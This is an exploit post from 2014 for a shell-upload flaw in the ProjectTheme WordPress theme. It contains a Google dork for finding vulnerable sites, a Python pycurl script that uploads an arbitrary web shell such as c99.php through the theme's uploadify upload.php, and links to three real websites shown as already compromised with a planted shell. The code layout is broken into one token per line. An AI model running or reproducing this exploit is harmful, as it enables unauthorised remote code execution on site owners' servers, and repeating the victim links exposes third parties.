############################################################################
# Title : Wordpress Theme ProjectTheme Shell Upload Vulnerability
# Author : Aloulou
# Date : 08/07/2014
# Facebook : facebook.com/Aloulou.TN
# Email: aloulou@alquds.com
# Vendor : http://sitemile.com/products/wordpress-project-freelancer-theme/ ($69.99)
# Google Dork : inurl:/wp-content/themes/ProjectTheme
# Tested on : Linux
############################################################################
Exploit:
import
optparse
import
sys
import
pycurl
from
cStringIO
import
StringIO
print
"#________________________________________________________#"
print
"| |"
print
"| ProjectTheme Shell Upload Exploit |"
print
"| |"
print
"| Author:Aloulou |"
print
"| Dork: inurl:/wp-content/themes/ProjectTheme |"
print
"| Facebook: facebook.com/Aloulou.TN |"
print
"| Email:aloulou@alquds.com |"
print
"| Greeting to Tunisia , AnonBoy & All muslims |"
print
"#________________________________________________________#\n"
parser
=
optparse.OptionParser(usage
=
'python %s -t http://site.com -s shellname -p UploadingPath \nExample: python %s -t http://target.com -s c99.php -p /wp-content/uploads'
%
(sys.argv[
0
],sys.argv[
0
]))
parser.add_option(
'-t'
,
'--target'
,action
=
"store"
, dest
=
"target"
,
help
=
"-t http://site.com"
, default
=
"")
parser.add_option(
'-s'
,
'--shell'
,action
=
"store"
, dest
=
"shellname"
,
help
=
"-s c99.php"
, default
=
"")
parser.add_option(
'-p'
,
'--path'
,action
=
"store"
, dest
=
"path"
,
help
=
"-p /wp-content/uploads"
, default
=
"")
options, args
=
parser.parse_args()
if
options.target
=
=
"
": print ("
Type
\
"python %s -h\" for help"
%
sys.argv[
0
])
else
:
pth
=
'folder'
shpath
=
options.path
target
=
options.target
filename
=
options.shellname
psd
=
'Filedata'
themename
=
'ProjectTheme'
c
=
pycurl.Curl()
c.setopt(c.POST,
1
)
c.setopt(c.HTTPPOST, [(
'title'
,
'test'
), ((psd, (c.FORM_FILE, filename)))])
c.setopt(c.VERBOSE,
0
)
bodyOutput
=
StringIO()
headersOutput
=
StringIO()
c.setopt(c.WRITEFUNCTION, bodyOutput.write)
c.setopt(c.URL,
'%s/wp-content/themes/%s/lib/uploadify/upload.php?%s=/%s'
%
(target,themename,pth,shpath) )
c.setopt(c.HEADERFUNCTION, headersOutput.write)
c.perform()
x
=
bodyOutput.getvalue()
shname
=
options.shellname
if
"/"
in
shname:
shname
=
options.shellname.rsplit(
'/'
,
1
)
if
x
=
=
"1"
:
print
(
'Shell uploaded successfully LINK=%s/%s/%s'
%
(target,shpath,shname[
1
]))
else
:
print
(
"Shell upload Failed!"
)
else
:
shname
=
options.shellname
if
x
=
=
"1"
:
print
(
'Shell uploaded successfully LINK=%s/%s/%s'
%
(target,shpath,shname))
else
:
print
(
"Shell upload Failed!"
)
Examples:
http:
/
/
www.ikargo.com
/
wp
-
content
/
themes
/
ProjectTheme
/
1337.php
http:
/
/
www.paketbeilagenclub.com
/
/
wp
-
content
/
themes
/
1337.php
https:
/
/
www.workyou.ru
/
wp
-
content
/
themes
/
ProjectTheme
/
1337.php
# Greeting to : Tunisia , AnonBoy & All muslims
############################################################################